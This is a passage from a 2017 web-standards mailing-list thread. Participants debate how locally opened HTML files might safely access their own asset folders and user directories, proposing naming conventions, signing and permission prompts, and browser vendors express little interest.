1) Giving HTML apps the ability to "open" and edit local user-provided
files and directories in a similar manner to desktop apps (the soundboard
example)

2) Loading (parts of) the app itself from a local filesystem, possibly
without any network access being available at all (the CD rom example).

Maybe the security would be easier to handle if dealt with both use-cases
separately. I think both use-cases have different requirements,
non-requirements and "prior art":

1) requires that file/directory paths be passed by the user dynamically,
but does not (to my knowledge) require that the app accesses any paths
*not* given by the user (if you treat a directory as "all paths within
it"). Maybe you could build upon the existing capability-based system used
for file input here: E.g. some extended file control that allows an app
enumerate/write access to the selected file or directory, but doesn't allow
it access to anything else.

2) sounds like an extension of offline apps to me. Maybe this could be
solved by defining some kind of package format for service workers and
cached resources, so service workers can be installed without any network
access.
On 15 Apr 2017, at 01:09, Patrick Dark <
Post by Patrick Dark
So if you put this file in the Windows Downloads directory, then it
has read access to all download files even though they aren't related?
Ah, well, that's why you have to ask the user. The prompt should make
Patrick makes a good point.
For example asking a user if it' sok for the HTML document to access
stuff in "C:\Users\Username\AppData\Local\Temp\" what do you think most
uses will do?
Just click OK, after all "they" have nothing important in that folder,
their stuff is in "Documents" instead.
Maybe a html document could have a offline mode parameter of some sort,
if the document is in the temp folder then it is put in a virtual
subfolder and can only access folders/files under that.
If it is not in the temp folder (or other such similar folder)
then a list of folders need to be provided.
For example
d:\Myhtmlapp\index.html (automatic as the document can access itself)
d:\Myhtmlapp\js\ (the javascript linked in the document is stored here)
d:\Myhtmlapp\css\ (the css linked in the document is stored here)
d:\Myhtmlapp\sounds\ (sounds to be indexed/used by the document, i.e a
soundboard)
This way a htmlapp will work as a single file document on it's own (as
it does today) or with specified subfolders. It would not have access to
anything outside of the specified subfolders or files.
Open file and Save File requesters on the other hand could be allowed
outside those folders as those are directly controlled by the user.
Indexing/parsing of files in non-app subfolders is another issue that
will require a different take (listing filenames/sizes/dates).
How to specify subfolders I'm not sure, document header? Or maybe
leverage the current work on for Offline Webapps which uses a separate
file?
Browsers also need to be make sure that a file is not added to the temp
folder that enables access to sub folders. (The root of the temp folder
should always be treated as special regardless.)
--
Roger Hågensen,
Freelancer, Norway.
Jeffrey Yasskin
2017-04-20 14:15:21 UTC
Permalink
Post by Philipp Serafin
If I see this correctly, we're currently talking about two different
1) …
2) Loading (parts of) the app itself from a local filesystem, possibly
without any network access being available at all (the CD rom example).
Maybe the security would be easier to handle if dealt with both use-cases
separately. I think both use-cases have different requirements,
1) …
2) sounds like an extension of offline apps to me. Maybe this could be
solved by defining some kind of package format for service workers and
cached resources, so service workers can be installed without any network
access.
FWIW, we're working on such a packaging format in
https://github.com/dimich-g/webpackage. It's still early, and we haven't
yet described how to do things like check certificate and package
revocation, but it's got the overall direction we're thinking about.

Jeffrey

David Kendal
2017-04-15 17:54:04 UTC
Permalink
Patrick makes a good point.
For example asking a user if it' sok for the HTML document to access
stuff in "C:\Users\Username\AppData\Local\Temp\" what do you think most
uses will do?
Just click OK, after all "they" have nothing important in that folder,
their stuff is in "Documents" instead.
This is why I added the restriction that pages can only request access
to directories that are parents of the directory they're in. I admit I
don't actually know much about how Windows lays out files these days --
if the 'Downloads' folder is within some other folder that also contains
a load of private stuff. If so, or if that's so on some other popular
OS, maybe I'm wrong.

Browsers could also add restrictions that you can't request access to
the root directory or top-level subdirectory of an OS volume, or what-
ever else is needed for appropriate security on a particular OS.

Some participants on the Chrome bug thread suggested that Chrome could
look for some hidden file that would give files in the directory under
it XHR/Fetch access to that directory. That seems similar to what you
suggest, but I dislike the idea of a hidden file doing this unbeknownst
to users -- and even if it were visible, its function may not be obvious.
--
dpk (David P. Kendal) · Nassauische Str. 36, 10717 DE · http://dpk.io/
Gott schütze mich vor Staub und Schmutz, +49 159 03847809
vor Feuer, Krieg und Denkmalschutz.
— seen on an old building in Bamberg, Bavaria
Patrick Dark
2017-04-15 23:45:52 UTC
Permalink
Post by David Kendal
Patrick makes a good point.
For example asking a user if it' sok for the HTML document to access
stuff in "C:\Users\Username\AppData\Local\Temp\" what do you think most
uses will do?
Just click OK, after all "they" have nothing important in that folder,
their stuff is in "Documents" instead.
This is why I added the restriction that pages can only request access
to directories that are parents of the directory they're in. I admit I
don't actually know much about how Windows lays out files these days --
if the 'Downloads' folder is within some other folder that also contains
a load of private stuff. If so, or if that's so on some other popular
OS, maybe I'm wrong.
"Downloads" is a sibling directory of "Documents" and child directory of
the user directory on Windows 10. Since this is a catch-all downloads
folder, it may contain sensitive files, so I'd imagine allowing an HTML
file to read everything in this directory would be viewed as an
unacceptable security risk.
Post by David Kendal
Browsers could also add restrictions that you can't request access to
the root directory or top-level subdirectory of an OS volume, or what-
ever else is needed for appropriate security on a particular OS.
I'd also imagine it unlikely that anyone would want to implement a
directory-dependent (i.e., operating system-dependent) JavaScript API.

It seems that what you'd need is not a new JavaScript API, but a totally
new application/manifest format like *.htmlapp that contains the HTML
file. This would guarantee that the HTML file is scoped to a safe
quasi-directory.

However, this presents a problem since you then need viewers/editors
created for this niche format to be able to easily modify the offline
application. Further, this format would be a competitor format to
operating system-dependent application formats, so there'd be market
incentive *against* a native implementation. Why would Microsoft, for
example, want to add support for this offline application format when
they'd like you to create a Windows Store app instead?
duanyao
2017-04-17 11:53:27 UTC
Permalink
Post by David Kendal
Patrick makes a good point.
For example asking a user if it' sok for the HTML document to access
stuff in "C:\Users\Username\AppData\Local\Temp\" what do you think most
uses will do?
Just click OK, after all "they" have nothing important in that folder,
their stuff is in "Documents" instead.
This is why I added the restriction that pages can only request access
to directories that are parents of the directory they're in.
Maybe this is not enough.

The directories which users would save web pages to usually also contain
large amount of personal
data. E.g. "C:/Users/<user name>/Documents|Downloads" on Windows and
"/home/<user name>/Documents|Downloads" on linux. Temp directory is also
sensitive.

Asking permission for a sensitive directory is not ideal: users either
lose functionality of the saved page,
or risk losing privacy.
Post by David Kendal
I admit I
don't actually know much about how Windows lays out files these days --
if the 'Downloads' folder is within some other folder that also contains
a load of private stuff. If so, or if that's so on some other popular
OS, maybe I'm wrong.
Browsers could also add restrictions that you can't request access to
the root directory or top-level subdirectory of an OS volume, or what-
ever else is needed for appropriate security on a particular OS.
It is impratical to blacklist all sensitive directories, because many
users use customized data
directories, e.g. "D:/work" or "D:/MyData".
Post by David Kendal
Some participants on the Chrome bug thread suggested that Chrome could
look for some hidden file that would give files in the directory under
it XHR/Fetch access to that directory. That seems similar to what you
suggest, but I dislike the idea of a hidden file doing this unbeknownst
to users -- and even if it were visible, its function may not be obvious.
The major problem of this solution is that users may be tricked to
download such configuration file

to a sensitive directory, and open a hole permanently.


Here is my solution: restrict local file access to certain directory
naming partteners.


The use cases of local html files can be divided into two types: single
page application and

multi-page application.


For single page application, browsers restrict `foo.html`'s permission
to `foo_files/` in the same

parent directory. Note that it is already a common practice for browsers
to save a page's resource

to a `xxx_files/` directory; browsers just need to grant the permission
of `xxx_files/`.


For multi-page application, browsers requires that its "application root
directory" ends with `_webrun`

(or other sensible name). All files within an `xxx_webrun/` are treated
as same-origin, but they

can't access files outside of the `xxx_webrun/`.


There is no need to ask users for permission to `xxx_files/` or
`xxx_webrun/`directories. For html

files without such directories, access to local files may not be allowed.


It is much less likely that users would unintenionally or be tricked to
put files into an existing

`xxx_files/` or `xxx_webrun/`directory, so the security risk is
minimized. Browsers can even enforce it:

warn users when try to save a file into an existing `xxx_files/` or
`xxx_webrun/`directory.


Regards,

Duan, Yao.
duanyao
2017-04-17 13:22:20 UTC
Permalink
Post by duanyao
For single page application, browsers restrict `foo.html`'s permission
to `foo_files/` in the same parent directory. Note that it is already
a common practice for browsers
to save a page's resource to a `xxx_files/` directory; browsers just
need to grant the permission
of `xxx_files/`.
I like that idea. But there is no need to treat single and multipage
differently is there?
d:\documents\test.html
d:\documents\test.html_files\page2.html
d:\documents\test.html_files\page3.html
This can handle multipage fine as well.
Anything in the folder test.html_files is considered sandboxed under
test.html
The problem is, what if users open `test_files\page2.html`or
`test_files\page3.html`directly? Can they access `test_files\config.json`?
This is to be solve by the "muli-page application" convention. By the
way, the name of the directory is usually `foo_files`, not `foo.html_files`.
This would allow a user (for a soundboard) to drop audio files into
d:\documents\test.html_files\sounds\jingle\
d:\documents\test.html_files\sounds\loops\
and so on.
And if writing ability is added to javasript then write permission
could be given to those folders (so audio files could be created and
stored without "downloading" them each time)
I just checked what naming Chrome does and it uses the page title. I
can't recall what the other browsers do. And adds _files to it.
Chrome can be configured to ask for location when saving a page, then
you can name it as you will.
The "xxx_files" convention was introduced by IE or Netscape long ago,
and other browsers just follow it.
So granting read/write/listing permissions for the html file to that
folder and it's subfolders would certainly make single page offline
apps possible.
Yeah, I think it is unlike harmful to allow write/listing permission as
well.
I have not tested how editing/adding to this folder affect things,
deleting the html file also deletes the folder (at least on Windows
10, and I seem to recall on Windows 7 as well).
There is no magic link between `foo.html` and `foo_files/`, this is just
a trick of Windows Explorer. You can change things by hand in that
directory as you will.
I'm not sure if a offline app needs the folder linked to the html file
or not.
A web developer might create the folder manually in which case there
will be no link. And if zipped and moved to a different
system/downloaded by users then any such html and folder linking will
be lost as well.
Maybe instead of d:\documents\test.html_files\
d:\documents\test.html_data\ could be used?
This would also distinguish it from the current user saved webpages.
duanyao
2017-04-18 10:17:28 UTC
Permalink
Post by duanyao
This can handle multipage fine as well.
Anything in the folder test.html_files is considered sandboxed under
test.html
The problem is, what if users open `test_files\page2.html`or
`test_files\page3.html`directly? Can they access
`test_files\config.json`?
This is to be solve by the "muli-page application" convention. By the
way, the name of the directory is usually `foo_files`, not
`foo.html_files`.
Good point. But why would a user do that when the entry point is the
test.html?
The user may bookmark it and access it later on; the tab maybe restored
from a previous browser session;
the user may open it from the histroy list, and so on.
In this case the browser could just fallback to default behavior for
local html files.
Agree.
Alternatively the browser could have some logic that knows that this
is a page under the test folder which is the sandbox for test.html
Also your example of "test_files\page3.html" and
"test_files\config.json" ofcourse page3.html could access it, just
like it could access config.js if not for CORS on XHR and local files.
Maybe no. "files" is a generic word, so if you make every "xxx_files/"
folders magical, it's quite possible that there are folders happen to
ends with "_files" but are not intented to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for muli-page app.

This is why I propose a new (and unlikely already used) pattern
`xxx_webrun/` for more powerful muli-page app, and limit `xxx_files/` to
single page app.

In single page app case, it would be more common that `test.html` gets
`test_files\page{2|3}.html` via XHR and renders the latter in place,
instead of navigating to it.
So the latter don't need to access `test_files\config.json` themselves.
Actually a lot of the issue here is XHR (and fetch) not being possible
for local web pages.
The only reason I suggested using the same naming convention for the
sandbox folder is that (at least on Windows) Explorer deletes both the
html and folder something users are familiar with. Though I'm sure
Microsoft could add support for the same to another folder naming
convention, I can't see that being backported to Windows 8.1/8/7.
`xxx_webrun/` convention doesn't need OSes' support, just browsers'; and
you just delete that folder to delete the app completely.
Post by duanyao
I just checked what naming Chrome does and it uses the page title. I
can't recall what the other browsers do. And adds _files to it.
Chrome can be configured to ask for location when saving a page, then
you can name it as you will.
The "xxx_files" convention was introduced by IE or Netscape long ago,
and other browsers just follow it.
...
I have not tested how editing/adding to this folder affect things,
deleting the html file also deletes the folder (at least on Windows
10, and I seem to recall on Windows 7 as well).
There is no magic link between `foo.html` and `foo_files/`, this is just
a trick of Windows Explorer. You can change things by hand in that
directory as you will.
I just confirmed that. just creating a empty .html file and a same
named folder with _Files at the end does "link" them in Explorer.
Is this unique to Windows or does other platforms do the
same/something similar?
Probably just Windows Explorer. At least Nautilus file manager on linux
doesn't do the trick.
Ashley Sheridan
2017-04-18 10:52:10 UTC
Permalink
Post by duanyao
Maybe no. "files" is a generic word, so if you make every "xxx_files/"
folders magical, it's quite possible that there are folders happen to
ends with "_files" but are not intented to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for muli-page app.
This is why I propose a new (and unlikely already used) pattern
`xxx_webrun/` for more powerful muli-page app, and limit `xxx_files/` to
single page app.
In single page app case, it would be more common that `test.html` gets
`test_files\page{2|3}.html` via XHR and renders the latter in place,
instead of navigating to it.
So the latter don't need to access `test_files\config.json` themselves.
*any* magic behavior is a sure-fire sign that something is wrong(TM)


Thanks,
Ash
duanyao
2017-04-18 11:18:57 UTC
Permalink
Post by Ashley Sheridan
Post by duanyao
Maybe no. "files" is a generic word, so if you make every "xxx_files/"
folders magical, it's quite possible that there are folders happen to
ends with "_files" but are not intented to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for muli-page app.
This is why I propose a new (and unlikely already used) pattern
`xxx_webrun/` for more powerful muli-page app, and limit `xxx_files/` to
single page app.
In single page app case, it would be more common that `test.html` gets
`test_files\page{2|3}.html` via XHR and renders the latter in place,
instead of navigating to it.
So the latter don't need to access `test_files\config.json` themselves.
*any* magic behavior is a sure-fire sign that something is wrong(TM)
Maybe. But there are occasions where magic is unavoidable. E.g. how to
infer the MIME type of a file? filename extension? magic numbers? all
are magic.

If the barrier is not high enough, name it `xxx__webrun__/`.
Post by Ashley Sheridan
Thanks,
Ash
Ashley Sheridan
2017-04-18 11:27:46 UTC
Permalink
Post by duanyao
Post by Ashley Sheridan
Post by duanyao
Maybe no. "files" is a generic word, so if you make every
"xxx_files/"
Post by Ashley Sheridan
Post by duanyao
folders magical, it's quite possible that there are folders happen
to
Post by Ashley Sheridan
Post by duanyao
ends with "_files" but are not intented to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for muli-page app.
This is why I propose a new (and unlikely already used) pattern
`xxx_webrun/` for more powerful muli-page app, and limit
`xxx_files/`
Post by Ashley Sheridan
Post by duanyao
to
single page app.
In single page app case, it would be more common that `test.html`
gets
Post by Ashley Sheridan
Post by duanyao
`test_files\page{2|3}.html` via XHR and renders the latter in place,
instead of navigating to it.
So the latter don't need to access `test_files\config.json`
themselves.
Post by Ashley Sheridan
*any* magic behavior is a sure-fire sign that something is wrong(TM)
Maybe. But there are occasions where magic is unavoidable. E.g. how to
infer the MIME type of a file? filename extension? magic numbers? all
are magic.
If the barrier is not high enough, name it `xxx__webrun__/`.
But when you're talking about security, which we are, relying on magic anything is potentially disastrous.

You mention mime types and file extensions, both of which are not safe to rely on for anything related to security, hence there being entire libraries and frameworks to attempt to determine and test a files real type (windows still fails abysmally in this area though).

Just relying on magic filenames *will* fail. Consider the scenario where a file is accidentally copied over the original entry html. Now it's associated with the wrong directory of assets and other 'linked' files. This new html entry point file could easily be an exploited file, looking to grab whatever data is being held locally on your machine.
Post by duanyao
Post by Ashley Sheridan
Thanks,
Ash
Thanks,
Ash
duanyao
2017-04-18 12:03:07 UTC
Permalink
Post by Ashley Sheridan
Post by duanyao
Post by Ashley Sheridan
Post by duanyao
Maybe no. "files" is a generic word, so if you make every
"xxx_files/"
Post by Ashley Sheridan
Post by duanyao
folders magical, it's quite possible that there are folders happen
to
Post by Ashley Sheridan
Post by duanyao
ends with "_files" but are not intented to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for muli-page app.
This is why I propose a new (and unlikely already used) pattern
`xxx_webrun/` for more powerful muli-page app, and limit
`xxx_files/`
Post by Ashley Sheridan
Post by duanyao
to
single page app.
In single page app case, it would be more common that `test.html`
gets
Post by Ashley Sheridan
Post by duanyao
`test_files\page{2|3}.html` via XHR and renders the latter in place,
instead of navigating to it.
So the latter don't need to access `test_files\config.json`
themselves.
Post by Ashley Sheridan
*any* magic behavior is a sure-fire sign that something is wrong(TM)
Maybe. But there are occasions where magic is unavoidable. E.g. how to
infer the MIME type of a file? filename extension? magic numbers? all
are magic.
If the barrier is not high enough, name it `xxx__webrun__/`.
But when you're talking about security, which we are, relying on magic anything is potentially disastrous.
You mention mime types and file extensions, both of which are not safe to rely on for anything related to security, hence there being entire libraries and frameworks to attempt to determine and test a files real type (windows still fails abysmally in this area though).
Those libraries and frameworks *will* fail because it is entirely
possible that a file is conformant to multiple formats simultaneously.
Also the methodology use by those libraries and frameworks is magic.
Post by Ashley Sheridan
Just relying on magic filenames *will* fail. Consider the scenario where a file is accidentally copied over the original entry html. Now it's associated with the wrong directory of assets and other 'linked' files. This new html entry point file could easily be an exploited file, looking to grab whatever data is being held locally on your machine.
Sure it is possible, but usually the damage is limited because the entry
file can only access a limited folder `XXX_files`. By
accidentally overriding a html file, you already cause a data loss in
the first place.
Post by Ashley Sheridan
Post by duanyao
Post by Ashley Sheridan
Thanks,
Ash
Thanks,
Ash
duanyao
2017-04-18 14:08:53 UTC
Permalink
Post by Ashley Sheridan
Post by duanyao
Post by Ashley Sheridan
Post by duanyao
Maybe no. "files" is a generic word, so if you make every
"xxx_files/"
Post by Ashley Sheridan
Post by duanyao
folders magical, it's quite possible that there are folders happen
to
Post by Ashley Sheridan
Post by duanyao
ends with "_files" but are not intented to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for muli-page app.
This is why I propose a new (and unlikely already used) pattern
`xxx_webrun/` for more powerful muli-page app, and limit
`xxx_files/`
Post by Ashley Sheridan
Post by duanyao
to
single page app.
In single page app case, it would be more common that `test.html`
gets
Post by Ashley Sheridan
Post by duanyao
`test_files\page{2|3}.html` via XHR and renders the latter in place,
instead of navigating to it.
So the latter don't need to access `test_files\config.json`
themselves.
Post by Ashley Sheridan
*any* magic behavior is a sure-fire sign that something is wrong(TM)
Maybe. But there are occasions where magic is unavoidable. E.g. how to
infer the MIME type of a file? filename extension? magic numbers? all
are magic.
If the barrier is not high enough, name it `xxx__webrun__/`.
But when you're talking about security, which we are, relying on magic anything is potentially disastrous.
You mention mime types and file extensions, both of which are not safe to rely on for anything related to security, hence there being entire libraries and frameworks to attempt to determine and test a files real type (windows still fails abysmally in this area though).
Just relying on magic filenames *will* fail. Consider the scenario where a file is accidentally copied over the original entry html. Now it's associated with the wrong directory of assets and other 'linked' files. This new html entry point file could easily be an exploited file, looking to grab whatever data is being held locally on your machine.
If a local web app is really critical, it may be digitally signed to
prevent tampering.
For example, signatures and certifications can be placed in
`foo_files/META-INF/` or `foo_webrun/META-INF/`(like a signed jar).
A browser can detect change to any file within the web app when loading
and stops to run.

Signing with a self-signed cert should be enough to detect accident
damage, and browsers can do this every time it saves a web page.
Post by Ashley Sheridan
Post by duanyao
Post by Ashley Sheridan
Thanks,
Ash
Thanks,
Ash
Ian Hickson
2017-04-18 18:23:32 UTC
Permalink
The main thing that seems to be missing from this thread is any commitment
from any browser vendors to actually support any changes in this space. I
would recommend the following steps for anyone hoping to push changes to
Web specifications on this topic:

- Approach Web browser vendors privately, to see if they are interested in
changing their behaviour in this space.

- If you find interest, collect up the use cases that you want to address,
and post them to this list for discussion.

- Collect the input on use cases and try to design a solution that fits all
the important use cases, then send an an e-mail to this list proposing a
basic design.

Cheers,
--
Ian Hickson
--
--
Ian Hickson

😸
duanyao
2017-04-19 03:45:20 UTC
Permalink
Post by Ian Hickson
The main thing that seems to be missing from this thread is any
commitment from any browser vendors to actually support any changes in
this space.
Yes, and I had been pessimistic about that even before I join this thread.

Actually I join the discussion mainly to see whether there are some
convincing reasons for web standards and browsers to ignore local files.
It is more than welcome if browser vendors would like to comment on this.

Something already mentioned:

* Local files are against the philosophy of the Web.
Then the problem is what is the philosophy of the Web exactly and why
-- seems still unclear.

* Accessing local files from local files with JavaScript is insecure.
Some solutions (including mine) are discussed and I think this is
solvable. Please comment if anyone think otherwise.

* Accessing local files is not portable.
I think with some best practices in mind a local web app can be quite
portable. I'd like to see counterexamples
if anyone has some.

* A local http server could be an alternative.
Problems of a local http server have been discussed in detail.

* Electron/NW.js etc. could be alternatives.
It is overkill to ship a small web app with a large runtime,
especially when the advanced desktop features are not needed.
The enoumous man power devoted to Electron/NW.js and similar projects
is a signal that local web app is relevant.

Something not mentioned here, just my guess:

* Local web app is against the business model of current Internet.
Please consider users first.

* Cloud is the future, local files will become irrelevant.
Seems premature, and there are people who feel unconfortable to
cloudize all personal data and workflow.
Post by Ian Hickson
I would recommend the following steps for anyone hoping to push
- Approach Web browser vendors privately, to see if they are
interested in changing their behaviour in this space.
I've no such private link.
Post by Ian Hickson
- If you find interest, collect up the use cases that you want to
address, and post them to this list for discussion.
- Collect the input on use cases and try to design a solution that
fits all the important use cases, then send an an e-mail to this list
proposing a basic design.
These have been a lot of discussion on that in this thread. Do you think
writing a more formal document would be helpful?
Post by Ian Hickson
Cheers,
--
Ian Hickson
--
--
Ian Hickson
😸
Anne van Kesteren
2017-04-19 08:09:59 UTC
Permalink
These have been a lot of discussion on that in this thread. Do you think writing a more formal document would be helpful?
Perhaps. Fundamentally, I don't think you've made a compelling enough
case for folks to become interested and wanting to work in this space
and help you solve your problem. You've also have been fairly
dismissive of the alternative points of view, such as the web being
fundamentally linked to HTTP and that distributing (offline)
applications over HTTP is the goal. That might make folks less
compelled to engage with you.

I suspect no browser, and I'm pretty certain about Mozilla since I
work there, is interested in furthering file URLs. Most new operating
systems abstract away the file system and the web as browsers see it
has always done that. There's ways to pull files in, but there's not
much use for letting applications write them out again (other than
downloads, which are quite a bit different).
--
https://annevankesteren.nl/
duanyao
2017-04-19 09:08:32 UTC
Permalink
Post by Anne van Kesteren
These have been a lot of discussion on that in this thread. Do you think writing a more formal document would be helpful?
Perhaps. Fundamentally, I don't think you've made a compelling enough
case for folks to become interested and wanting to work in this space
and help you solve your problem. You've also have been fairly
dismissive of the alternative points of view, such as the web being
fundamentally linked to HTTP and that distributing (offline)
applications over HTTP is the goal. That might make folks less
compelled to engage with you.
I'm sorry to make you feel that I have been dismissive of the
alternative points of view.
This is really not intended. I just don't quite understand some of those
points. For example,
Is "the web being fundamentally linked to HTTP" just the current status
of the industry, or
the inherent philosiphy of the web? If the latter, some explanation or
document would be very
appreciated.
Post by Anne van Kesteren
I suspect no browser, and I'm pretty certain about Mozilla since I
work there, is interested in furthering file URLs.
It is very helpful to hear clear a signals from browser vendors,
positive or not. Thanks.
Post by Anne van Kesteren
Most new operating
systems abstract away the file system and the web as browsers see it
has always done that. There's ways to pull files in, but there's not
much use for letting applications write them out again (other than
downloads, which are quite a bit different).
Doesn't file: protocol also abstract away much of the file system? What
parts make it a bad abstraction?
You mentioned casing and unicode normalization.

I'm not particularly eager to write access myself. Maybe we can
seperately discuss read and write cases.
Anne van Kesteren
2017-04-19 09:28:32 UTC
Permalink
Post by duanyao
This is really not intended. I just don't quite understand some of those
points. For example,
Is "the web being fundamentally linked to HTTP" just the current status of
the industry, or
the inherent philosiphy of the web? If the latter, some explanation or
document would be very
appreciated.
I suspect it's actually a little higher-level than HTTP, with that
indeed being the current state, but the web is about the exchange of
data between computers and definitely sits at a higher level of
abstraction than the particulars of the Linux or Windows file system.
It's hard to define concretely I think, but being platform-independent
and having data addressable from anywhere are important principles.
Post by duanyao
Doesn't file: protocol also abstract away much of the file system? What
parts make it a bad abstraction?
You mentioned casing and unicode normalization.
File URLs (it's not a protocol really) are still fundamentally tied to
the file system, including how it's hierarchical and such. And then
indeed there's all the legacy implications of file URLs.
Post by duanyao
I'm not particularly eager to write access myself. Maybe we can seperately
discuss read and write cases.
I already pointed to https://wicg.github.io/entries-api/ as a way to
get access to a directory of files and <input type=file> as a way to
get access to a sequence of files. Both for read access. I haven't
seen any interest to go beyond that.
--
https://annevankesteren.nl/
duanyao
2017-04-19 10:28:46 UTC
Permalink
Post by Anne van Kesteren
Post by duanyao
This is really not intended. I just don't quite understand some of those
points. For example,
Is "the web being fundamentally linked to HTTP" just the current status of
the industry, or
the inherent philosiphy of the web? If the latter, some explanation or
document would be very
appreciated.
I suspect it's actually a little higher-level than HTTP, with that
indeed being the current state, but the web is about the exchange of
data between computers and definitely sits at a higher level of
abstraction than the particulars of the Linux or Windows file system.
It's hard to define concretely I think, but being platform-independent
and having data addressable from anywhere are important principles.
It's quite helpful, thanks.
If "addressable from anywhere" is a hard requirement then file: url is
doomed with the web,
and further discussion would be unnecessary. Though
platform-independency could be achieved technically.
Post by Anne van Kesteren
Post by duanyao
Doesn't file: protocol also abstract away much of the file system? What
parts make it a bad abstraction?
You mentioned casing and unicode normalization.
File URLs (it's not a protocol really) are still fundamentally tied to
the file system, including how it's hierarchical and such. And then
indeed there's all the legacy implications of file URLs.
Post by duanyao
I'm not particularly eager to write access myself. Maybe we can seperately
discuss read and write cases.
I already pointed to https://wicg.github.io/entries-api/ as a way to
get access to a directory of files and <input type=file> as a way to
get access to a sequence of files. Both for read access. I haven't
seen any interest to go beyond that.
Well, I meant accessing local files from local files without user
actions (e.g. XHR/fetch), mainly used

to load a web app's own assets.
Joshua Bell
2017-04-19 19:35:22 UTC
Permalink
Post by Anne van Kesteren
I already pointed to https://wicg.github.io/entries-api/ as a way to
get access to a directory of files and <input type=file> as a way to
get access to a sequence of files. Both for read access. I haven't
seen any interest to go beyond that.
Is this the Filesystem & FileWriter API ?
A small subset of the functionality specified in FileSystem was used by
Chrome to expose directory upload. Support for that subset necessary for
interop of directory upload has been implemented by Firefox and Edge. I put
up the entries-api spec to try and re-specify just that subset. (It's a
work in progress.)
This was added to Chrome/Opera under the webkit prefix 7 years ago, Edge
and Firefox has not picked this up yet (just the Reader part).
(as shown by http://caniuse.com/#search=file )
The market apparently demonstrates that a sandboxed file system storage API
isn't high priority for browser vendors to implement.
I avoid prefixed features, and try to use only features that latest
Edge/Chrome/Firefox support so that end users are more likely to not end up
in a situation where their browser do not support a app.
And unless I remember wrong Firefox did support this at some point then
removed it again.
Take for example my soundbank app.
A end user would want to either use a file selector or drag'n'drop to the
app (browser) window to add files to the soundboard.
Let us assume that 30+ sounds are added (I don't even think the
filerequester handles multiselection properly in all browsers today)
Would it be fair to expect the user to have to re-add these each time they
start/open the app? During a week that is a lot of pointless work.
Saving filenames is not practical, and even if it was there would be no
paths.
And storing the sounds in IndexDB or localStorage is out of the question
as that is limited to a total of 5MB or even less in most browsers, 30+
samples easily consumes that.
You may want to check again. An origin typically gets an order of magnitude
more storage than that for Indexed DB across browsers and devices.
The ideal here is to make a html soundboard app locally (i.e file://) then
copy it as is to a webserver. Users can either use it from there (http://
or https:// online and/or offline) or "Save As" the document and use it
locally (file://) for preservation or offline use without server dependency.
The only way to make this work currently is to make the user hand write
the path (full or relative) to each sound and store that in localStorage
along with volume and fade in/out.
But fade in and out is "faked" by adjusting the <audio> volume as CORS
prevents processing the audio and doing a proper crossfade between sounds
which is possible but locked down due to CORS.
I can understand limitations due to security concerns, but arbitrary
limitations to functionality baffles me.
I do not see much difference between file:// http(s):// besides one
allowing serverside data processing and http headers, but these days most
apps are entirely clientside. A sample editor can be written that is fully
clientside, even including mic recording normalizing, FX, the server is not
involved in any stage except delivering the .html file + a few lines of
headers. The web app itself is identical (i.e. hash/checksum identical) be
The benefit is that "the app is the source code" which is a ideal goal of
open source as anyone can review and copy and modify as they please.
And in theory it could run just as well truly offline/standalone as it
could online without the need for a local webserver or similar.
I'd dare say that thinking of a web app as something hosted only from a
server via http(s) is a antiquated idea.
These days a "web" app can be hosted via anything, want to open a webapp
that is served from a cloud storage like Dropbox? Not a problem.
Well, almost not a problem. a cloud storage probably do not have the
proper CORS header to allow a sample editor to process sound from local
files or files stored on a different cloud service.
And a soundboard or a sample editor is just two examples, a image or video
edit would have similar issues. OR what about a game with mod support?
Being able to drag'n'drop a mod onto a game and then have the game load it
the next time you start the game would be a huge benefit.
But currently this can not be done, the mod would have to be uploaded to
the server the game is served from, even if the game itself does not use or
need any serverside scripting.
Or imagine a medical app that needs to read in CSV data, such a app could
work fully offline/local and load up the data each time it's started.
Storing the data in localstorage/indexDB would be limited to whatever else
is stored as far as size goes, and browsers can just wipe the local
storage/indexDB without warning. At least a local file stored on d:\docs\
is safe from vanishing.
Even if the app itself is online and served from a server you still can't
have it load a list.CSV from d:\docs\ when starting it for example. And
IndexDB/localStorage is limited to around 5MB total for that domain. Maybe
there is a desire to switch between datasets list1.csv and list2.csv and
list3.csv and before you know it you open xray.png enhance a area and save
that change (in localStorage as you can save the path and a zoomvalue you
have to save the entire image instead) and suddenly list1.csv get deleted
One of the ideas you're highlighting here is around allowing web apps to
access local files in a read/write fashion, possibly in a persistent way.
There's been some discussion about that at:
https://github.com/WICG/writable-files

....

On the topic of file:// behavior - the history of support in browsers is
instructional here. Early browsers (naively) assumed that local content
could be fully trusted, more so than content served over HTTP (think IE
security zones). As the web security model has evolved, the capabilities
granted to file:// content has become more and more restricted over the
years. I expect that trend to continue rather than reverse.
--
Unless specified otherwise, anything I write publicly is considered Public
Domain (CC0).
Roger Hågensen,
Freelancer, Norway.
Yay295
2017-04-19 19:55:01 UTC
Permalink
Maybe a solution then would be to provide a way to request more storage
space?
Post by Joshua Bell
Post by Anne van Kesteren
I already pointed to https://wicg.github.io/entries-api/ as a way to
get access to a directory of files and <input type=file> as a way to
get access to a sequence of files. Both for read access. I haven't
seen any interest to go beyond that.
Is this the Filesystem & FileWriter API ?
A small subset of the functionality specified in FileSystem was used by
Chrome to expose directory upload. Support for that subset necessary for
interop of directory upload has been implemented by Firefox and Edge. I put
up the entries-api spec to try and re-specify just that subset. (It's a
work in progress.)
This was added to Chrome/Opera under the webkit prefix 7 years ago, Edge
and Firefox has not picked this up yet (just the Reader part).
(as shown by http://caniuse.com/#search=file )
The market apparently demonstrates that a sandboxed file system storage API
isn't high priority for browser vendors to implement.
I avoid prefixed features, and try to use only features that latest
Edge/Chrome/Firefox support so that end users are more likely to not end
up
in a situation where their browser do not support a app.
And unless I remember wrong Firefox did support this at some point then
removed it again.
Take for example my soundbank app.
A end user would want to either use a file selector or drag'n'drop to the
app (browser) window to add files to the soundboard.
Let us assume that 30+ sounds are added (I don't even think the
filerequester handles multiselection properly in all browsers today)
Would it be fair to expect the user to have to re-add these each time
they
start/open the app? During a week that is a lot of pointless work.
Saving filenames is not practical, and even if it was there would be no
paths.
And storing the sounds in IndexDB or localStorage is out of the question
